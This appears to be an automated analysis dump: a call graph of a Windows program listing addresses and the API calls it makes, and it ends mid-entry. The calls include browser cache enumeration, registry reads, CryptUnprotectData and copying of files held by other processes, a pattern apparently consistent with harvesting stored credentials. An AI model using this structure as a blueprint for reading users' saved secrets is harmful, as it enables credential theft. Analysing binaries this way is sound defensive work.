37499 416bfa 37496->37499 37498 416bca SHGetSpecialFolderPathW 37502 414508 37498->37502 38111 416466 RegOpenKeyExW 37499->38111 37502->37111 37503 416c27 37504 416c5a wcscpy 37503->37504 38112 416b16 wcscpy 37503->38112 37504->37502 37506 416c38 38113 416480 RegQueryValueExW 37506->38113 37508 416c4f RegCloseKey 37508->37504 37510 40a321 37509->37510 37511 40a302 wcscpy 37509->37511 37510->37151 37512 409cd8 2 API calls 37511->37512 37513 40a310 wcscat 37512->37513 37513->37510 37515 40b4e4 FindClose 37514->37515 37516 40b447 37515->37516 37517 409f85 2 API calls 37516->37517 37518 40b45b 37517->37518 37519 40a2de 6 API calls 37518->37519 37520 40b46f 37519->37520 37520->37223 37522 40b406 37521->37522 37523 40b435 37521->37523 37522->37523 37524 40b40d wcscmp 37522->37524 37523->37223 37524->37523 37525 40b424 wcscmp 37524->37525 37525->37523 37527 40b43e 9 API calls 37526->37527 37533 413df1 37527->37533 37528 40b477 9 API calls 37528->37533 37529 413e20 37531 40b4e4 FindClose 37529->37531 37530 40b3fa 2 API calls 37530->37533 37532 413e2b 37531->37532 37532->37223 37533->37528 37533->37529 37533->37530 37534 413e30 255 API calls 37533->37534 37534->37533 37536 40b4a1 FindNextFileW 37535->37536 37537 40b482 FindFirstFileW 37535->37537 37538 40b4ba 37536->37538 37539 40b4b5 37536->37539 37537->37538 37541 40b4dc 37538->37541 37542 40a2de 6 API calls 37538->37542 37540 40b4e4 FindClose 37539->37540 37540->37538 37541->37223 37542->37541 37543->37090 37544->37077 37545->37149 37546->37173 37547->37173 37548->37191 37550 40a248 37549->37550 37550->37211 37551->37246 37553 415786 37552->37553 37554 41577c FreeLibrary 37552->37554 37555 408d81 free 37553->37555 37554->37553 37556 41578f 37555->37556 37557 408d81 free 37556->37557 37558 415797 37557->37558 37558->37063 37559->37072 37560->37062 37561->37131 37563 44ddb0 37562->37563 37564 4010b3 memset 37563->37564 37565 40a22f 2 API calls 37564->37565 37566 4010e9 wcsrchr 37565->37566 37567 4010fa 37566->37567 37568 4010fd memset 37566->37568 37567->37568 37569 406cd0 27 API calls 37568->37569 37570 401126 37569->37570 37571 40a2de 6 API calls 37570->37571 37572 40113a 37571->37572 38114 40a157 GetFileAttributesW 37572->38114 37574 401149 37575 401179 37574->37575 37576 40a22f 2 API calls 37574->37576 38115 40154c 37575->38115 37578 40115c 37576->37578 37580 406cd0 27 API calls 37578->37580 37584 401169 37580->37584 37581 4011ee CloseHandle 37583 4011f5 memset 37581->37583 37582 4011ce 38227 40a004 GetTempPathW 37582->38227 38148 40aca5 WideCharToMultiByte 37583->38148 37588 40a2de 6 API calls 37584->37588 37586 4011de CopyFileW 37586->37583 37588->37575 37589 40121d 38149 445e0f 37589->38149 37592 401487 37594 401492 DeleteFileW 37592->37594 37595 40149f 37592->37595 37593 406c77 27 API calls 37596 401249 37593->37596 37594->37595 37597 40b671 ??3@YAXPAX 37595->37597 38195 43a264 37596->38195 37599 4014a7 37597->37599 37599->37066 37600 40147f 38207 44577a 37600->38207 37603 401270 memset 38230 427363 17 API calls 37603->38230 37604 401478 38257 426e79 124 API calls 37604->38257 37607 427363 17 API calls 37617 40125d 37607->37617 37610 40acda MultiByteToWideChar 37610->37617 37611 40acf3 MultiByteToWideChar 37611->37617 37614 401369 memcmp 37614->37617 37615 409f85 2 API calls 37615->37617 37616 407687 38 API calls 37616->37617 37617->37600 37617->37603 37617->37604 37617->37607 37617->37610 37617->37611 37617->37614 37617->37615 37617->37616 37619 4014f2 memset memcpy 37617->37619 37625 401413 memcmp 37617->37625 38231 42733f 16 API calls 37617->38231 38232 401003 SystemTimeToFileTime FileTimeToLocalFileTime 37617->38232 38233 4272ff 17 API calls 37617->38233 38234 42731f 17 API calls 37617->38234 38235 44d2f0 memset 37617->38235 38236 44d9d0 memset memcpy memcpy memcpy 37617->38236 38237 40b60e ??2@YAPAXI memcpy ??3@YAXPAX 37617->38237 38238 44d990 memcpy memcpy memcpy 37617->38238 38239 427117 37617->38239 38258 40acf3 MultiByteToWideChar 37619->38258 37622 40153c LocalFree 37622->37617 37625->37617 37626->37155 37627->37159 37629 40b4f7 37628->37629 37630 40b4ed FindClose 37628->37630 37629->37209 37630->37629 37632 409f96 37631->37632 37633 409f99 memcpy 37631->37633 37632->37633 37633->37130 37635 406cd0 27 API calls 37634->37635 37636 413e6c 37635->37636 37637 40a2de 6 API calls 37636->37637 37638 413e7c 37637->37638 38688 40a157 GetFileAttributesW 37638->38688 37640 413e8b 37641 413ea3 37640->37641 37642 4010a6 254 API calls 37640->37642 37643 406cd0 27 API calls 37641->37643 37642->37641 37644 413eaf 37643->37644 37645 40a2de 6 API calls 37644->37645 37646 413ebf 37645->37646 38689 40a157 GetFileAttributesW 37646->38689 37648 413ece 37649 413ee6 37648->37649 37650 4010a6 254 API calls 37648->37650 37649->37161 37650->37649 37651->37106 37652->37185 37653->37190 37654->37225 37655->37207 37656->37254 37657->37254 37658->37236 37659->37265 37660->37267 37661->37269 37663 416b94 17 API calls 37662->37663 37664 40c75c 37663->37664 37734 40c681 37664->37734 37669 40c86c 37686 40aed1 37669->37686 37670 40b5f5 2 API calls 37671 40c7ab FindFirstUrlCacheEntryW 37670->37671 37672 40c864 37671->37672 37673 40c7cc wcschr 37671->37673 37674 40b671 ??3@YAXPAX 37672->37674 37675 40c80c FindNextUrlCacheEntryW 37673->37675 37676 40c7df 37673->37676 37674->37669 37675->37673 37677 40c821 GetLastError 37675->37677 37678 40aed1 9 API calls 37676->37678 37679 40c85b FindCloseUrlCache 37677->37679 37680 40c82c 37677->37680 37681 40c7ec wcschr 37678->37681 37679->37672 37683 40b5f5 2 API calls 37680->37683 37681->37675 37682 40c7fd 37681->37682 37684 40aed1 9 API calls 37682->37684 37685 40c83f FindNextUrlCacheEntryW 37683->37685 37684->37675 37685->37673 37685->37679 37828 40afa0 37686->37828 37689 40aef2 37689->37276 37690 40aef6 7 API calls 37690->37689 37833 40b7d1 free free 37691->37833 37693 40c88b 37694 406cd0 27 API calls 37693->37694 37695 40c895 37694->37695 37834 416466 RegOpenKeyExW 37695->37834 37697 40c8a2 37698 40c9bc 37697->37698 37699 40c8ad 37697->37699 37713 405153 37698->37713 37700 40aff4 4 API calls 37699->37700 37701 40c8c6 memset 37700->37701 37835 40b043 37701->37835 37704 40c9b3 RegCloseKey 37704->37698 37705 40c91f 37706 40c928 _wcsupr 37705->37706 37707 40aef6 7 API calls 37706->37707 37708 40c946 37707->37708 37709 40aef6 7 API calls 37708->37709 37710 40c95a memset 37709->37710 37711 40b043 37710->37711 37712 40c992 RegEnumValueW 37711->37712 37712->37704 37712->37706 37837 40503c 37713->37837 37717 409f85 2 API calls 37716->37717 37718 40acd3 _wcslwr 37717->37718 37719 40cae2 37718->37719 37894 40517d 37719->37894 37722 40cb0a wcslen 37897 4051d2 39 API calls 37722->37897 37723 40cbcb wcslen 37723->37290 37725 40cb25 37726 40cbc1 37725->37726 37898 4051a7 39 API calls 37725->37898 37900 4051fb 39 API calls 37726->37900 37729 40cb53 37729->37726 37730 40cb57 memset 37729->37730 37731 40cb81 37730->37731 37899 40ca37 44 API calls 37731->37899 37733->37283 37735 40b43e 9 API calls 37734->37735 37740 40c6be 37735->37740 37736 40b477 9 API calls 37736->37740 37737 40c712 37739 40b4e4 FindClose 37737->37739 37738 40b3fa 2 API calls 37738->37740 37741 40c71d 37739->37741 37740->37736 37740->37737 37740->37738 37742 40c6df _wcsicmp 37740->37742 37743 40c681 35 API calls 37740->37743 37746 40c34b memset memset 37741->37746 37742->37740 37744 40c6f6 37742->37744 37743->37740 37759 40c532 22 API calls 37744->37759 37747 416b94 17 API calls 37746->37747 37748 40c39d 37747->37748 37749 40a2de 6 API calls 37748->37749 37750 40c3b6 37749->37750 37760 40a157 GetFileAttributesW 37750->37760 37752 40c3c5 37753 40c3de 37752->37753 37754 40a2de 6 API calls 37752->37754 37761 40a157 GetFileAttributesW 37753->37761 37754->37753 37756 40c3ed 37757 40c401 37756->37757 37762 40c210 37756->37762 37757->37669 37757->37670 37759->37740 37760->37752 37761->37756 37783 40bd7c 37762->37783 37764 40c2f1 37765 40c2fa DeleteFileW 37764->37765 37766 40c30e 37764->37766 37765->37766 37767 40b671 ??3@YAXPAX 37766->37767 37769 40c319 37767->37769 37768 40c27f 37768->37764 37806 40bed3 37768->37806 37771 40c322 CloseHandle 37769->37771 37772 40c32a 37769->37772 37771->37772 37774 408d81 free 37772->37774 37773 40c2d1 37776 40c2e2 37773->37776 37777 40c2da CloseHandle 37773->37777 37775 40c339 37774->37775 37780 408d81 free 37775->37780 37827 40b7d1 free free 37776->37827 37777->37776 37779 40c29e 37779->37773 37826 40c009 30 API calls 37779->37826 37781 40c341 37780->37781 37781->37757 37784 407a50 22 API calls 37783->37784 37785 40bd9a 37784->37785 37786 40bec9 37785->37786 37787 40bae3 74 API calls 37785->37787 37786->37768 37788 40bdc9 37787->37788 37788->37786 37789 40b5f5 ??2@YAPAXI ??3@YAXPAX 37788->37789 37790 40bdeb OpenProcess 37789->37790 37791 40beb0 37790->37791 37792 40be02 GetCurrentProcess DuplicateHandle 37790->37792 37793 40bebe 37791->37793 37796 407a50 22 API calls 37791->37796 37794 40bea8 CloseHandle 37792->37794 37795 40be2e GetFileSize 37792->37795 37797 40b671 ??3@YAXPAX 37793->37797 37794->37791 37798 40a004 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 37795->37798 37796->37793 37797->37786 37799 40be48 37798->37799 37800 409c9b CreateFileW 37799->37800 37801 40be4f CreateFileMappingW 37800->37801 37802 40be69 MapViewOfFile 37801->37802 37803 40be9e CloseHandle CloseHandle 37801->37803 37804 40be99 CloseHandle 37802->37804 37805 40be7d WriteFile UnmapViewOfFile 37802->37805 37803->37794 37804->37803 37805->37804 37807 40beea 37806->37807 37808 4083cc 11 API calls 37807->37808 37809 40befd 37808->37809 37810 40bf05 memset 37809->37810 37811 40bff7 37809->37811 37815 40bf46 37810->37815 37812 4081df free ??3@YAXPAX 37811->37812 37814 40c002 37812->37814 37813 4086cb 13 API calls 37813->37815 37814->37779 37815->37813 37816 40838f SetFilePointerEx ReadFile 37815->37816 37817 40baae _wcsicmp 37815->37817 37818 40bfe1 37815->37818 37822 408c6a 8 API calls 37815->37822 37823 40b109 wcslen wcslen _memicmp 37815->37823 37824 40bfa2 _snwprintf 37815->37824 37816->37815 37817->37815 37819 40bfe6 free 37818->37819 37820 40bfef 37818->37820 37819->37820 37821 40b02a free 37820->37821 37821->37811 37822->37815 37823->37815 37825 40aef6 7 API calls 37824->37825 37825->37815 37826->37779 37827->37764 37830 40afa6 37828->37830 37829 40aee1 37829->37689 37829->37690 37830->37829 37831 40afc2 wcscmp 37830->37831 37832 40afbb _wcsicmp 37830->37832 37831->37830 37832->37830 37833->37693 37834->37697 37836 40b049 RegEnumValueW 37835->37836 37836->37704 37836->37705 37838 405151 37837->37838 37839 405046 37837->37839 37838->37290 37840 406cd0 27 API calls 37839->37840 37841 405050 37840->37841 37842 40ae2a 8 API calls 37841->37842 37843 405056 37842->37843 37882 406c77 37843->37882 37845 405064 strcpy strcat GetProcAddress 37846 406c77 27 API calls 37845->37846 37847 405095 37846->37847 37885 40502d GetProcAddress 37847->37885 37849 40509e 37850 406c77 27 API calls 37849->37850 37851 4050ab 37850->37851 37886 40502d GetProcAddress 37851->37886 37853 4050b4 37854 406c77 27 API calls 37853->37854 37855 4050c1 37854->37855 37887 40502d GetProcAddress 37855->37887 37857 4050ca 37858 406c77 27 API calls 37857->37858 37859 4050d7 37858->37859 37888 40502d GetProcAddress 37859->37888 37861 4050e0 37862 406c77 27 API calls 37861->37862 37863 4050ed 37862->37863 37889 40502d GetProcAddress 37863->37889 37865 4050f6 37866 406c77 27 API calls 37865->37866 37867 405103 37866->37867 37890 40502d GetProcAddress 37867->37890 37869 40510c 37870 406c77 27 API calls 37869->37870 37871 405119 37870->37871 37891 40502d GetProcAddress 37871->37891 37873 405122 37874 406c77 27 API calls 37873->37874 37875 40512f 37874->37875 37892 40502d GetProcAddress 37875->37892 37877 405138 37878 406c77 27 API calls 37877->37878 37879 405145 37878->37879 37893 40502d GetProcAddress 37879->37893 37881 40514e 37881->37838 37883 406f91 27 API calls 37882->37883 37884 406c7c 37883->37884 37884->37845 37885->37849 37886->37853 37887->37857 37888->37861 37889->37865 37890->37869 37891->37873 37892->37877 37893->37881 37895 40503c 39 API calls 37894->37895 37896 405185 37895->37896 37896->37722 37896->37723 37897->37725 37898->37729 37899->37726 37900->37723 37902 407670 FreeLibrary 37901->37902 37903 4075d1 37902->37903 37904 40ae2a 8 API calls 37903->37904 37905 4075db 37904->37905 37906 4075e7 37905->37906 37907 407669 37905->37907 37908 406c77 27 API calls 37906->37908 37907->37295 37907->37297 37907->37298 37909 4075f1 GetProcAddress 37908->37909 37910 406c77 27 API calls 37909->37910 37911 40760b GetProcAddress 37910->37911 37912 406c77 27 API calls 37911->37912 37913 40761e GetProcAddress 37912->37913 37914 406c77 27 API calls 37913->37914 37915 407632 GetProcAddress 37914->37915 37916 406c77 27 API calls 37915->37916 37917 407646 GetProcAddress 37916->37917 37918 407655 37917->37918 37919 40765b 37918->37919 37920 407670 FreeLibrary 37918->37920 37919->37907 37920->37907 37922 407682 37921->37922 37923 407677 FreeLibrary 37921->37923 37922->37312 37923->37922 37924->37303 37926 4076e2 37925->37926 37927 407692 37925->37927 37928 407700 37926->37928 37929 4076e9 CryptUnprotectData 37926->37929 37930 406cd0 27 API calls 37927->37930 37928->37303 37929->37928 37931 40769c 37930->37931 37932 40ae2a 8 API calls 37931->37932 37933 4076a2 37932->37933 37934 4076a9 37933->37934 37935 4076cb 37933->37935 37936 406c77 27 API calls 37934->37936 37935->37926 37937 4076d9 FreeLibrary 37935->37937 37938 4076b3 GetProcAddress 37936->37938 37937->37926 37938->37935 37939 4076c4 37938->37939 37939->37935 37941 416073 FreeLibrary 37940->37941 37942 41607e 37940->37942 37941->37942 37942->37315 37944 41686a 37943->37944 37945 4167dc 37943->37945 37944->37331 37944->37333 37946 406cd0 27 API calls 37945->37946 37947 4167e3 37946->37947 37948 40ae2a 8 API calls 37947->37948 37949 4167e9 37948->37949 37950 406c77 27 API calls 37949->37950 37951 4167f4 GetProcAddress 37950->37951 37952 406c77 27 API calls 37951->37952 37953 41680b GetProcAddress 37952->37953 37954 406c77 27 API calls 37953->37954 37955 41681c GetProcAddress 37954->37955 37956 406c77 27 API calls 37955->37956 37957 41682d GetProcAddress 37956->37957 37958 406c77 27 API calls 37957->37958 37959 41683e GetProcAddress 37958->37959 37960 406c77 27 API calls 37959->37960 37961 41684f GetProcAddress 37960->37961 37962 406c77 27 API calls 37961->37962 37963 416860 GetProcAddress 37962->37963 37963->37944 37964->37343 37965->37343 37966->37343 37967->37343 37968->37335 37970 412dca 37969->37970 37984 412f8e memset memset 37970->37984 37972 412e88 37997 40b7d1 free free 37972->37997 37973 412de0 memset 37976 412dd0 37973->37976 37975 412e90 37975->37350 37976->37972 37976->37973 37977 40a2de 6 API calls 37976->37977 37978 40a157 GetFileAttributesW 37976->37978 37979 40aef6 7 API calls 37976->37979 37977->37976 37978->37976 37979->37976 37981 40a610 GetFileTime CloseHandle 37980->37981 37982 40a626 CompareFileTime 37980->37982 37981->37982 37982->37350 37983->37351 37985 416b94 17 API calls 37984->37985 37986 412fd9 37985->37986 37987 409cd8 2 API calls 37986->37987 37988 412fe0 wcscat 37987->37988 37989 416b94 17 API calls 37988->37989 37990 413002 37989->37990 37991 409cd8 2 API calls 37990->37991 37992 413009 wcscat 37991->37992 37998 412e96 37992->37998 37995 412e96 20 API calls 37996 413036 37995->37996 37996->37976 37997->37975 37999 412ea3 37998->37999 38000 40b43e 9 API calls 37999->38000 38008 412ed8 38000->38008 38001 412f7c 38002 40b4e4 FindClose 38001->38002 38003 412f87 38002->38003 38003->37995 38004 40b43e 9 API calls 38004->38008 38005 40b477 9 API calls 38005->38008 38006 40b3fa wcscmp wcscmp 38006->38008 38007 40b4e4 FindClose 38007->38008 38008->38001 38008->38004 38008->38005 38008->38006 38008->38007 38009 40aef6 7 API calls 38008->38009 38009->38008 38011 40a2de 6 API calls 38010->38011 38012 413531 38011->38012 38025 40a157 GetFileAttributesW 38012->38025 38014 41353d 38015 413548 6 API calls 38014->38015 38016 4136fd 38014->38016 38021 4135f0 38015->38021 38016->37372 38018 4135ff memset 38019 413637 wcscpy 38018->38019 38018->38021 38019->38021 38020 40a2de 6 API calls 38020->38021 38021->38016 38021->38018 38021->38020 38022 40aed1 9 API calls 38021->38022 38026 416716 38021->38026 38023 413657 memset memset _snwprintf wcscpy 38022->38023 38023->38021 38024->37376 38025->38014 38029 416312 38026->38029 38028 41673a 38028->38021 38030 41631f 38029->38030 38031 416325 38030->38031 38032 416377 GetPrivateProfileStringW 38030->38032 38033 416365 38031->38033 38034 416329 wcschr 38031->38034 38032->38028 38036 416369 WritePrivateProfileStringW 38033->38036 38034->38033 38035 416337 _snwprintf 38034->38035 38035->38036 38036->38028 38037->37381 38039 406cd0 27 API calls 38038->38039 38040 404f7e 38039->38040 38041 40a2de 6 API calls 38040->38041 38042 404f8e 38041->38042 38067 40a157 GetFileAttributesW 38042->38067 38044 404f9d 38045 404fb4 38044->38045 38068 404b0a 241 API calls 38044->38068 38046 406cd0 27 API calls 38045->38046 38050 404fb8 38045->38050 38048 404fc9 38046->38048 38049 40a2de 6 API calls 38048->38049 38051 404fd9 38049->38051 38050->37384 38050->37411 38069 40a157 GetFileAttributesW 38051->38069 38053 404fe8 38053->38050 38054 404fed 38053->38054 38070 404e95 72 API calls 38054->38070 38056 404fff 38056->38050 38057->37406 38058->37411 38059->37412 38060->37411 38061->37417 38062->37419 38063->37422 38064->37423 38065->37427 38066->37411 38067->38044 38068->38045 38069->38053 38070->38056 38098 41599c 38071->38098 38074 415984 K32GetModuleFileNameExW 38075 415997 38074->38075 38075->37444 38077 4153b6 wcscpy 38076->38077 38078 4153b9 wcschr 38076->38078 38089 415487 38077->38089 38078->38077 38080 4153db 38078->38080 38103 409db6 wcslen wcslen _memicmp 38080->38103 38082 4153e7 38083 4153f1 memset 38082->38083 38084 415433 38082->38084 38104 40a394 GetWindowsDirectoryW wcscpy 38083->38104 38085 415439 memset 38084->38085 38086 41547e wcscpy 38084->38086 38105 40a394 GetWindowsDirectoryW wcscpy 38085->38105 38086->38089 38089->37444 38090 415416 wcscpy wcscat 38090->38089 38091 41545e memcpy wcscat 38091->38089 38093 415727 38092->38093 38094 4156fd GetModuleHandleW 38092->38094 38096 415730 GetProcessTimes 38093->38096 38097 415743 38093->38097 38094->38093 38095 41570c GetProcAddress 38094->38095 38095->38093 38096->37446 38097->37446 38099 4159a1 38098->38099 38100 41597c 38098->38100 38101 40ae2a 8 API calls 38099->38101 38100->38074 38100->38075 38102 4159ac GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38101->38102 38102->38100 38103->38082 38104->38090 38105->38091 38106->37467 38107->37489 38109 40a2b8 GetVersionExW 38108->38109 38110 40a2c9 38108->38110 38109->38110 38110->37496 38110->37498 38111->37503 38112->37506 38113->37508 38114->37574 38116 401559 38115->38116 38259 40d0d4 38116->38259 38119 4016ff 38280 40d0ba 38119->38280 38124 406cd0 27 API calls 38125 4015a3 38124->38125 38287 40d19e _wcsicmp 38125->38287 38127 4015a9 38127->38119 38288 40d162 6 API calls 38127->38288 38129 4015da 38130 40d3b2 17 API calls 38129->38130 38131 4015e2 38130->38131 38132 4016f7 38131->38132 38133 406cd0 27 API calls 38131->38133 38134 40d0ba 4 API calls 38132->38134 38135 4015f4 38133->38135 38134->38119 38289 40d19e _wcsicmp 38135->38289 38137 4015fa 38137->38132 38138 401615 memset memset WideCharToMultiByte 38137->38138 38290 401a60 strlen 38138->38290 38140 401674 38141 406c77 27 API calls 38140->38141 38142 401684 memcmp 38141->38142 38142->38132 38143 401696 38142->38143 38144 407687 38 API calls 38143->38144 38145 4016c4 38144->38145 38145->38132 38146 4016d3 memcpy 38145->38146 38147 4016ee LocalFree 38145->38147 38146->38147 38147->38132 38148->37589 38350 44529f 38149->38350 38151 445e29 38152 401230 38151->38152 38364 4179ee 38151->38364 38152->37592 38152->37593 38154 445cc3 11 API calls 38155 44607d 38154->38155 38155->38152 38158 44577a 112 API calls 38155->38158 38156 445e63 38157 445e96 memcpy 38156->38157 38183 445e81 38156->38183 38368 4171be 38157->38368 38158->38152 38160 445f02 38161 445f20 38160->38161 38162 445f09 38160->38162 38373 445cf3 38161->38373 38163 41888c 16 API calls 38162->38163 38163->38183 38166 445cf3 18 API calls 38167 445f42 38166->38167 38168 445cf3 18 API calls 38167->38168 38169 445f4e 38168->38169 38170 445cf3 18 API calls 38169->38170 38171 445f5e 38170->38171 38171->38183 38387 434c1c 38171->38387 38174 445cf3 18 API calls 38175 445f8f 38174->38175 38391 420e2a 38175->38391 38177 445fae 38178 445fb5 38177->38178 38179 445fcd 38177->38179 38181 41888c 16 API calls 38178->38181 38407 434efa 38179->38407 38181->38183 38183->38154 38184 434efa memset 38185 445fe8 38184->38185 38185->38183 38413 41888c 38185->38413 38187 446025 38421 436b92 38187->38421 38189 44602c 38429 43945e 38189->38429 38193 44603c 38193->38183 38194 41888c 16 API calls 38193->38194 38194->38183 38503 418f96 38195->38503 38197 43a273 38198 43a283 38197->38198 38199 43a277 38197->38199 38510 43a06c 38198->38510 38540 4460c9 11 API calls 38199->38540 38203 43a281 38203->37617 38205 43a2b2 38206 43a06c 135 API calls 38205->38206 38206->38203 38208 44578d 38207->38208 38210 4457a0 38207->38210 38610 418fd1 11 API calls 38208->38610 38210->37592 38211 445792 38212 4457a6 38211->38212 38213 445796 38211->38213 38612 431fe3 memset memset memcpy 38212->38612 38611 4460c9 11 API calls 38213->38611 38216 4457b8 38217 4457ca 38216->38217 38222 44580c 38216->38222 38218 41888c 16 API calls 38217->38218 38218->38210 38219 445844 38614 431fe3 memset memset memcpy 38219->38614 38222->38219 38613 421004 104 API calls 38222->38613 38223 44584d 38224 41888c 16 API calls 38223->38224 38225 445925 38224->38225 38225->38210 38615 425167 memset memcpy 38225->38615 38228 40a033 GetTempFileNameW 38227->38228 38229 40a025 GetWindowsDirectoryW 38227->38229 38228->37586 38229->38228 38230->37617 38231->37617 38232->37617 38233->37617 38234->37617 38235->37617 38236->37617 38237->37617 38238->37617 38616 426e5a 38239->38616 38241 427137 38242 42714a 38241->38242 38243 42713b 38241->38243 38624 42704b 38242->38624 38623 4460c9 11 API calls 38243->38623 38246 4271d9 38247 417bdf 16 API calls 38246->38247 38248 427145 38247->38248 38248->37617 38250 42719b 38250->38246 38634 426f43 13 API calls 38250->38634 38253 42715c 38253->38246 38253->38250 38254 42704b 128 API calls 38253->38254 38632 43a2db 136 API calls 38253->38632 38633 426ec7 125 API calls 38253->38633 38254->38253 38255 4271b8 38255->38246 38635 417b4b memcpy 38255->38635 38257->37600 38258->37622 38291 409c82 CreateFileW 38259->38291 38261 40d0e2 38262 40d0eb GetFileSize 38261->38262 38263 40157e 38261->38263 38264 40b5f5 2 API calls 38262->38264 38263->38119 38271 40d3b2 38263->38271 38265 40d112 38264->38265 38292 40a8ae ReadFile 38265->38292 38267 40d11f 38293 40b170 MultiByteToWideChar 38267->38293 38269 40d143 CloseHandle 38270 40b671 ??3@YAXPAX 38269->38270 38270->38263 38272 408d81 free 38271->38272 38273 40d3c2 38272->38273 38299 40b7d1 free free 38273->38299 38275 401591 38275->38119 38275->38124 38276 40d3c9 38276->38275 38278 40d49d 38276->38278 38300 40d1f9 38276->38300 38279 40d1f9 14 API calls 38278->38279 38279->38275 38281 408d81 free 38280->38281 38282 40d0c3 38281->38282 38283 40b02a free 38282->38283 38284 40d0cb 38283->38284 38349 40b7d1 free free 38284->38349 38286 40118b memset CreateFileW 38286->37581 38286->37582 38287->38127 38288->38129 38289->38137 38290->38140 38291->38261 38292->38267 38294 40b1b9 38293->38294 38295 40b191 38293->38295 38294->38269 38296 40aff4 4 API calls 38295->38296 38297 40b19a 38296->38297 38298 40b1a2 MultiByteToWideChar 38297->38298 38298->38294 38299->38276 38301 40d229 38300->38301 38334 40b04f 38301->38334 38303 40d3a3 38304 40b02a free 38303->38304 38305 40d3ab 38304->38305 38305->38276 38307 40b04f 6 API calls 38308 40d2cb 38307->38308 38309 40b04f 6 API calls 38308->38309 38310 40d2ec 38309->38310 38311 40d318 38310->38311 38342 40b1dd wcslen memmove 38310->38342 38312 40d34d 38311->38312 38345 40b1dd wcslen memmove 38311->38345 38315 40aef6 7 API calls 38312->38315 38318 40d363 38315->38318 38316 40d304 38343 40b097 wcslen 38316->38343 38317 40d339 38346 40b097 wcslen 38317->38346 38324 40aef6 7 API calls 38318->38324 38321 40d30c 38344 40b1dd wcslen memmove 38321->38344 38322 40d341 38347 40b1dd wcslen memmove 38322->38347 38326 40d379 38324->38326 38348 40d4b9 malloc memcpy free free 38326->38348 38328 40d38b 38329 40b02a free 38328->38329 38330 40d393 38329->38330 38331 40b02a free 38330->38331 38332 40d39b 38331->38332 38333 40b02a free 38332->38333 38333->38303 38335 40b059 38334->38335 38341 40b089 38334->38341 38336 40b06a 38335->38336 38337 40b05e wcslen 38335->38337 38338 40aff4 malloc memcpy free free 38336->38338 38337->38336 38339 40b073 38338->38339 38340 40b077 memcpy 38339->38340 38339->38341 38340->38341 38341->38303 38341->38307 38342->38316 38343->38321 38344->38311 38345->38317 38346->38322 38347->38312 38348->38328 38349->38286 38351 4452ba 38350->38351 38361 4452b3 38350->38361 38440 41730b memcpy memcpy 38351->38440 38353 4452bf 38354 417472 10 API calls 38353->38354 38355 4452f0 38353->38355 38353->38361 38354->38355 38356 44535a memset 38355->38356 38355->38361 38358 445375 38356->38358 38357 44538a 38359 417690 10 API calls 38357->38359 38357->38361 38358->38357 38360 41b6b3 10 API calls 38358->38360 38362 4453aa 38359->38362 38360->38357 38361->38151 38362->38361 38363 41a8d8 10 API calls 38362->38363 38363->38361 38365 4179f8 38364->38365 38366 4179ff memset 38365->38366 38367 417a0e 38365->38367 38366->38367 38367->38156 38369 44529f 11 API calls 38368->38369 38370 4171cb 38369->38370 38371 4171cf 38370->38371 38372 4171f5 strcmp 38370->38372 38371->38160 38372->38370 38372->38371 38374 445d05 38373->38374 38375 445e00 38374->38375 38376 445d2b 38374->38376 38441 4460c9 11 API calls 38375->38441 38378 434c1c 3 API calls 38376->38378 38379 445d37 38378->38379 38381 445d52 38379->38381 38386 445d68 38379->38386 38380 434c1c 3 API calls 38382 445dc9 38380->38382 38383 41888c 16 API calls 38381->38383 38384 445d5e 38382->38384 38385 41888c 16 API calls 38382->38385 38383->38384 38384->38166 38385->38384 38386->38380 38388 434c33 38387->38388 38389 434c26 38387->38389 38388->38174 38442 434b92 memset memset memcpy 38389->38442 38392 420e3a 38391->38392 38393 4179ee memset 38392->38393 38394 420e7b 38393->38394 38395 420e85 38394->38395 38396 4179ee memset 38394->38396 38395->38177 38397 420e9a 38396->38397 38398 420ea1 38397->38398 38443 41d730 38397->38443 38398->38395 38458 41d278 102 API calls 38398->38458 38400 420ebe 38400->38398 38401 420ecc memset 38400->38401 38403 420ee9 38401->38403 38405 420ef6 38401->38405 38404 417103 6 API calls 38403->38404 38404->38405 38405->38398 38457 41d121 memset __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 38405->38457 38408 434f01 38407->38408 38409 434f10 38407->38409 38464 423e78 memset 38408->38464 38465 417a12 38409->38465 38412 434f0d 38412->38184 38414 418895 38413->38414 38417 4188e5 38413->38417 38415 4188a3 38414->38415 38469 424f29 memset 38414->38469 38415->38417 38470 4184f6 38415->38470 38417->38187 38422 436ba3 38421->38422 38490 434d28 38422->38490 38424 436bbd 38425 436bd4 38424->38425 38500 445a48 17 API calls 38424->38500 38496 417bdf 38425->38496 38428 436bde 38428->38189 38430 4394e6 38429->38430 38431 439473 38429->38431 38433 445cc3 38430->38433 38431->38430 38432 41888c 16 API calls 38431->38432 38432->38431 38434 445cc8 38433->38434 38438 445ce0 38433->38438 38501 418fd1 11 API calls 38434->38501 38436 445ccf 38436->38438 38502 4460c9 11 API calls 38436->38502 38438->38193 38439 445cdd 38439->38193 38441->38384 38442->38388 38445 41d769 38443->38445 38444 4179ee memset 38446 41d819 38444->38446 38449 41d7a0 38445->38449 38453 41d7db 38445->38453 38459 4460e5 11 API calls 38445->38459 38447 41d859 memcpy memcpy memcpy memcpy memcpy 38446->38447 38448 41d8d7 38446->38448 38446->38449 38447->38448 38456 41d904 38448->38456 38460 417149 38448->38460 38449->38400 38452 41d969 38452->38449 38454 41d989 memset 38452->38454 38453->38444 38453->38449 38454->38449 38456->38449 38463 41d121 memset __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 38456->38463 38457->38398 38458->38395 38459->38453 38462 41a2d6 56 API calls 38460->38462 38461 41715f 38461->38456 38462->38461 38463->38452 38464->38412 38466 417a1e 38465->38466 38467 417a25 memset 38466->38467 38468 417a34 38466->38468 38467->38468 38468->38412 38469->38415 38476 417c60 38470->38476 38475 424adc 15 API calls 38475->38417 38477 4181f0 38476->38477 38483 417c85 __aullrem __aulldvrm 38476->38483 38484 418476 38477->38484 38478 41832c 38479 418384 10 API calls 38478->38479 38479->38477 38480 4180d4 memset 38480->38483 38481 418384 10 API calls 38481->38483 38482 417c1b 10 API calls 38482->38483 38483->38477 38483->38478 38483->38480 38483->38481 38483->38482 38485 41847d 38484->38485 38489 4184ca 38484->38489 38486 417690 10 API calls 38485->38486 38487 41849a 38485->38487 38485->38489 38486->38487 38488 4184b7 memcpy 38487->38488 38487->38489 38488->38489 38489->38417 38489->38475 38491 434d66 38490->38491 38492 417a12 memset 38491->38492 38495 